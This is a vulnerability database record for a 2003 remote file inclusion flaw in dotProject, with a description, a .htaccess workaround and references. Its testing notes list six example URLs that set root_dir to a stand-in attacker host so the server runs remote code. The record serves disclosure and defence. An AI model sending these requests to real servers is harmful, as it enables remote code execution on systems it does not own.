{"id": "OSVDB:3592", "bulletinFamily": "software", "title": "dotProject classdefs/date.php $root_dir Arbitrary File Include", "description": "## Vulnerability Description\ndotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: \ncreate a .htaccess file that contains 'Deny from all' in the /modules/ directory.\n## Short Description\ndotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.\n## Manual Testing Notes\nhttp://[victim]/dotproject/modules/files/index_table.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/addedit.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/view.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/vw_files.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/tasks/addedit.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker\n## References:\nVendor URL: http://www.dotproject.net/\n[Secunia Advisory ID:7974](https://secuniaresearch.flexerasoftware.com/advisories/7974/)\n[Related OSVDB ID: 3593](https://vulners.com/osvdb/OSVDB:3593)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-01/0344.html\nISS X-Force ID: 11192\nBugtraq ID: 6710\n", "published": "2003-01-29T00:00:00", "modified": "2003-01-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/osvdb/OSVDB:3592", "reporter": "OSVDB", "references": [], "cvelist": [], "type": "osvdb", "lastseen": "2017-04-28T13:19:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "3e9850fae030a739259d9f83e3f72f2e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b34ef7618431bd84815d2a79fad5dc8f"}, {"key": "href", "hash": "915dd5cbc5fe791777ca72bca3a2435d"}, {"key": "modified", "hash": "b67c1dfa4370b6f104604c30732020d8"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b67c1dfa4370b6f104604c30732020d8"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "ee95b064a4456b6a8c2b902b20208499"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "hash": "351ed339ccb54983e590bc335c39372e477852dc2bd9d6b386a484599d2826c6", "viewCount": 0, "objectVersion": "1.2", "affectedSoftware": [{"name": "dotProject", "operator": "eq", "version": "dev20030121"}], "enchantments": {"vulnersScore": 5.0}}

{"result": {}}